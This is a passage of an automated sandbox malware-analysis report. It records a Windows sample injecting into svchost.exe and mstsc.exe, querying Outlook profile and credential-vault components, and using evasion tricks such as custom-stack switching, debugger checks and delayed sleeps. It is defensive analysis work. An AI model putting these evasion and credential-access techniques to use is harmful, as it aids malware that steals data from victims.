            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: rP0n___87004354.exeStatic file information: File size 1638912 > 1048576
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rP0n___87004354.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FrywuFHvnDbLo.exe, 00000002.00000000.1729011183.0000000000DBE000.00000002.00000001.01000000.00000004.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1882941520.0000000000DBE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, rP0n___87004354.exe, 00000000.00000003.1699565720.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1713196768.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710437251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1819913903.000000000436A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.0000000004510000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1818285042.00000000041B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, rP0n___87004354.exe, 00000000.00000003.1699565720.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1713196768.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710437251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000003.00000003.1819913903.000000000436A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.0000000004510000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1818285042.00000000041B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000001.00000003.1781073080.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781207304.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1763185053.0000000006CD0000.00000004.00000001.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1764554247.0000000006E10000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mstsc.exe, 00000003.00000002.3548096253.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883295228.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2104098329.000000002E32C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000001.00000003.1781073080.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781207304.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1763185053.0000000006CD0000.00000004.00000001.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1764554247.0000000006E10000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mstsc.exe, 00000003.00000002.3548096253.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883295228.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2104098329.000000002E32C000.00000004.80000000.00040000.00000000.sdmp
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rP0n___87004354.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007EC104 LoadLibraryA,GetProcAddress,0_2_007EC104
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D8538 push FFFFFF8Bh; iretd 0_2_007D853A
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0077C590 push eax; retn 0077h0_2_0077C599
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079E88F push edi; ret 0_2_0079E891
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079E9A8 push esi; ret 0_2_0079E9AA
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00798AC5 push ecx; ret 0_2_00798AD8
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079EB83 push esi; ret 0_2_0079EB85
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079EC6C push edi; ret 0_2_0079EC6E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A3A18 push ebx; retf 1_2_024A3A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A221F push ss; ret 1_2_024A2220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A3A2E push ebx; retf 1_2_024A3A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A3A23 push ebx; retf 1_2_024A3A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024973CB push esi; ret 1_2_024973CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02493380 push eax; ret 1_2_02493382
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02494878 push edx; iretd 1_2_02494879
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A80CC push ss; iretd 1_2_024A80D7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024921FE push ecx; ret 1_2_024921FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A8E2B push esi; ret 1_2_024A8E2C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0249A623 push edi; retf 1_2_0249A62D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AE76A push ebp; retf 1_2_024AE858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AE71E push edx; iretd 1_2_024AE71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0225F pushad ; ret 1_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F027FA pushad ; ret 1_2_02F027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0283D push eax; iretd 1_2_02F02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD push ecx; mov dword ptr [esp], ecx1_2_02F309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F01368 push eax; iretd 1_2_02F01369
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045127FA pushad ; ret 3_2_045127F9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0451225F pushad ; ret 3_2_045127F9
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0451283D push eax; iretd 3_2_04512858
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045409AD push ecx; mov dword ptr [esp], ecx3_2_045409B6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_001818CC push es; iretd 3_2_001818C5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00164048 push esi; ret 3_2_0016404B
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00774A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00774A35
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007F53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007F53DF
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00793307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00793307
            Source: C:\Users\user\Desktop\rP0n___87004354.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\rP0n___87004354.exeAPI/Special instruction interceptor: Address: 3B4014C
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 9821Jump to behavior
            Source: C:\Users\user\Desktop\rP0n___87004354.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-97729
            Source: C:\Users\user\Desktop\rP0n___87004354.exeAPI coverage: 4.3 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 4268Thread sleep count: 151 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 4268Thread sleep time: -302000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 4268Thread sleep count: 9821 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 4268Thread sleep time: -19642000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe TID: 3704Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe TID: 3704Thread sleep time: -40500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_007D449B
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DC75D FindFirstFileW,FindClose,0_2_007DC75D
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007DC7E8
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007DF021
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007DF17E
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007DF47F
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007D3833
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007D3B56
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007DBD48
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0017C460 FindFirstFileW,FindNextFileW,FindClose,3_2_0017C460
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00774AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00774AFE
            Source: FrywuFHvnDbLo.exe, 00000005.00000002.3547246577.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000008.00000002.2105767634.000002642E36E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
            Source: C:\Users\user\Desktop\rP0n___87004354.exeAPI call chain: ExitProcess graph end nodegraph_0-96249
            Source: C:\Users\user\Desktop\rP0n___87004354.exeAPI call chain: ExitProcess graph end nodegraph_0-96323
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E rdtsc 1_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A76F3 LdrLoadDll,1_2_024A76F3
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E401F BlockInput,0_2_007E401F
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00773B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00773B4C
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_007A5BFC
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007EC104 LoadLibraryA,GetProcAddress,0_2_007EC104
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402E1 mov eax, dword ptr fs:[00000030h]1_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov ecx, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008324 mov eax, dword ptr fs:[00000030h]1_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]1_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300634F mov eax, dword ptr fs:[00000030h]1_2_0300634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F402A0 mov eax, dword ptr fs:[00000030h]1_2_02F402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]1_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]1_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]1_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]1_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]1_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]1_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]1_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]1_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA250 mov eax, dword ptr fs:[00000030h]1_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]1_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]1_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]1_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]1_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
